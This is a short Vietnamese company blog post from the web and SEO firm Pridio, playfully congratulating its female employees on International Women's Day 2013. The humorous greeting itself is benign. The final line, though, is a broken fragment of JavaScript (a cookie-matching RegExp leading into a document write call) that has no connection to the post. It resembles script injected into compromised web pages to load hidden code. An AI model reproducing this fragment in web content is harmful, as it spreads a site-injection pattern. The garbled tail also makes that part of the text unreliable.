Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin Pridio > Chúc mừng ngày quốc tế phụ nữ 2013

Chúc mừng ngày quốc tế phụ nữ 2013

Trong suốt những tháng ngày đấu tranh với cái đói (lúc sắp đến giờ cơm trưa), với cái rét (lúc đi làm buổi sáng mùa đông) và với mệt mỏi (lúc leo cầu thang), chị em Pridio luôn tỏ ra kiên cường và thể hiện sức chịu đựng oai hùng hơn tất cả các anh bụng bự hay ốm o nhất trong công ty.

Cho tới thời điểm này, lực lượng của chị em đã trở lên hùng mạnh hơn cả và số và lượng, xinh hơn và tỏ ra xuất sắc hơn trong bất kỳ công việc nào của công ty. Đây chính là những lời chân thật mà ai trong công ty cũng hiểu được, nó tự nhiên đến mức không cần làm SEO mà ai cũng biết.

Trong năm 2013 này, chúng ta sẽ cần cố gắng nhiều hơn nữa để hoàn thành những mục tiêu mà chúng ta đã vạch ra. Vai trò của chị em là không thể thiếu được. Mong chị em hiểu vấn đề này và tỏ ra xứng đáng với nó.

Thay mặt toàn thể anh em và các bạn không được gọi là anh cũng không được gọi là chị, xin gửi tới chị em những dòng copywriting tốt đẹp nhất, mong rằng các bạn sẽ luôn xinh đẹp một cách khoẻ mạnh, đạt được những gì mà các bạn muốn, lấy được những thứ mà các bạn thích, và đặc biệt là chúc các bạn hoàn thành thật tốt công việc của mình.

Thay mặt Pridio – Người mà ai cũng đoán ra!

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘